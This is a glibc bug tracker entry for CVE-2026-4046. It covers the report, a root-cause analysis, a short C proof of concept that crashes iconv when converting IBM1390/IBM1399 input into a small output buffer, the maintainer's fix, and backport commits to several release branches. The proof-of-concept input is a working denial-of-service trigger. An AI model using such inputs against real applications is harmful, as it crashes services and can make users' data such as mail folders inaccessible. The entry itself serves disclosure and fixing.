Bug 33980 (CVE-2026-4046) - iconv: ibm139x trigger assertion error when converting to internal while lack enough room (CVE-2026-4046)
Summary: iconv: ibm139x trigger assertion error when converting to internal while lack...
Status: RESOLVED FIXED
Alias: CVE-2026-4046
Product: glibc
Classification: Unclassified
Component: locale (show other bugs)
Version: unspecified
: P2 normal
Target Milestone: 2.44
Assignee: Florian Weimer
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2026-03-12 05:02 UTC by Rocket Ma
Modified: 2026-04-21 21:03 UTC (History)
4 users (show)

See Also:
Host:
Target:
Build:
Last reconfirmed:
Project(s) to access:
ssh public key:
fweimer: security+


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Rocket Ma 2026-03-12 05:02:30 UTC
For ibm1390 and ibm1399 encoding, which have "combined" attribute, may cause glibc to run into assertion error. Below I attach a poc to indicate the bug. Compile the unit file below and run it could see libc report a "../iconv/skeleton.c:594: gconv: Assertion `outbuf == outerr' failed." error. This is reported in Arch Linux, with glibc version 2.43+r5+g856c426a7534. I checked git log and the files, `iconvdata/ibm139{0,9}.{c,h}` stay unchanged since the very first patch.

Here is what I found digging into the code:
1. SO COMBINED_WORD SI produced 2 internal word in outbuf in FROM_LOOP (SO and SI don't take space);
2. TO_LOOP consumed only one internal word (user outbuf is 4 bytes while 2 internal word converting to 2 utf-8 word require 8 bytes, outerr = outbuf + 4), outerr != outbuf, rerun needed;
3. In rerun, FROM_LOOP, with its `outend` restricted to outerr, caused combined word logic in LOOP to produce __GCONV_FULL_OUTPUT, and since combined word need atomically 2 internal words space, this is, 8 bytes, so outbuf is still outstart. So outbuf != outerr in this rerun, leading to assertion error.

I wonder if this bug is a security bug (DoS) as for an application influenced by CVE-2024-2961, could also be influenced by this bug and be aborted by the assertion error. Since a combined word take 2 bytes in IBM139x, and can be expanded to 6 bytes in UTF-8, a malicious input could quickly take up space to trigger this bug.

---

#define _GNU_SOURCE
#include <errno.h>
#include <iconv.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void
die (const char *msg)
{
  perror (msg);
  exit (1);
}

int
main (int argc, char **argv)
{
  setvbuf (stdout, NULL, _IONBF, 0);
  setvbuf (stderr, NULL, _IONBF, 0);

  const char *fromcode = argc >= 2 ? argv[1] : "IBM1390";
  const char *tocode = argc >= 3 ? argv[2] : "UTF-8";
  size_t outsz = argc >= 4 ? strtoul (argv[3], NULL, 0) : 4;

  /* IBM13xx combined-character example: 0xECB5 is a DBCS code that expands
     to two UCS-4 code points (U+304B U+309A). */
  unsigned char input[] = { 0x0e, 0xec, 0xb5, 0x0f };
  char *inptr = (char *) input;
  size_t inleft = sizeof (input);

  if (outsz == 0)
    outsz = 1;
  char *outbuf = malloc (outsz);
  if (!outbuf)
    die ("malloc");
  memset (outbuf, 0x41, outsz);
  char *outptr = outbuf;
  size_t outleft = outsz;

  fprintf (stderr,
           "[*] iconv %s -> %s, in=0e(SO) ecb5 0f(SI), outsz=%zu\n",
           fromcode, tocode, outsz);

  iconv_t cd = iconv_open (tocode, fromcode);
  if (cd == (iconv_t) -1)
    die ("iconv_open");

  errno = 0;
  long rc = iconv (cd, &inptr, &inleft, &outptr, &outleft);

  fprintf (stderr,
           "[*] iconv rc=%ld errno=%d (%s) inleft=%zu outleft=%zu\n",
           rc, errno, strerror (errno), inleft, outleft);

  fwrite(outbuf, 1, outsz - outleft, stdout);
  iconv_close (cd);
  free (outbuf);
  return 0;
}
Comment 1 Florian Weimer 2026-03-12 09:20:34 UTC
Yes, this is a security bug. Crashes in conversions to UTF-8 can make mail folders inaccessible in mutt, for example.
Comment 2 Florian Weimer 2026-03-31 16:12:51 UTC
I think I have a fix for this, I just need to write a proper test case for it.
Comment 3 Florian Weimer 2026-04-07 11:56:53 UTC
Fix with test case posted:

[PATCH v2] Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
<https://inbox.sourceware.org/libc-alpha/lhucy0b6l2w.fsf@oldenburg.str.redhat.com/>
Comment 4 Sourceware Commits 2026-04-16 17:18:53 UTC
The master branch has been updated by Florian Weimer <fw@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=d6f08d1cf027f4eb2ba289a6cc66853722d4badc

commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
Comment 5 Florian Weimer 2026-04-16 17:19:26 UTC
Fixed for 2.44 so far.
Comment 6 Sourceware Commits 2026-04-19 09:34:00 UTC
The release/2.43/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=8362e8ce10b24068bacc19552c128dd10e082fd9

commit 8362e8ce10b24068bacc19552c128dd10e082fd9
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 7 Sourceware Commits 2026-04-19 10:58:26 UTC
The release/2.42/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a

commit f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 8 Sourceware Commits 2026-04-20 20:23:58 UTC
The release/2.41/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=61737f43b1f0d9f64a6f16649625476b70f9f4d3

commit 61737f43b1f0d9f64a6f16649625476b70f9f4d3
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 9 Sourceware Commits 2026-04-20 21:01:11 UTC
The release/2.40/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f82c16babf26c9d4c46399111ed8383d84c93d67

commit f82c16babf26c9d4c46399111ed8383d84c93d67
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 10 Sourceware Commits 2026-04-20 22:00:44 UTC
The release/2.39/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=3e13579841429c56ad5497e6562c47067d8a53b0

commit 3e13579841429c56ad5497e6562c47067d8a53b0
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 11 Sourceware Commits 2026-04-21 17:08:10 UTC
The release/2.38/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=55b2c0820d47b5983b4210f96991f87f11ebe7c5

commit 55b2c0820d47b5983b4210f96991f87f11ebe7c5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 12 Sourceware Commits 2026-04-21 20:22:52 UTC
The release/2.37/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ba37b7465239b5496b013dd5279b495a4a0f4eb5

commit ba37b7465239b5496b013dd5279b495a4a0f4eb5
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
Comment 13 Sourceware Commits 2026-04-21 21:03:59 UTC
The release/2.36/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>:

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7abd383d439dc348419a9fd526d42ea4591e8aaf

commit 7abd383d439dc348419a9fd526d42ea4591e8aaf
Author: Florian Weimer <fweimer@redhat.com>
Date:   Thu Apr 16 19:13:43 2026 +0200

    Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046)
    
    Follow the example in iso-2022-jp-3.c and use the __count state
    variable to store the pending character.  This avoids restarting
    the conversion if the output buffer ends between two 4-byte UCS-4
    code points, so that the assert reported in the bug can no longer
    happen.
    
    Even though the fix is applied to ibm1364.c, the change is only
    effective for the two HAS_COMBINED codecs for IBM1390, IBM1399.
    
    The test case was mostly auto-generated using
    claude-4.6-opus-high-thinking, and composer-2-fast shows up in the
    log as well.  During review, gpt-5.4-xhigh flagged that the original
    version of the test case was not exercising the new character
    flush logic.
    
    This fixes bug 33980.
    
    Assisted-by: LLM
    Reviewed-by: Carlos O'Donell <carlos@redhat.com>
    (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)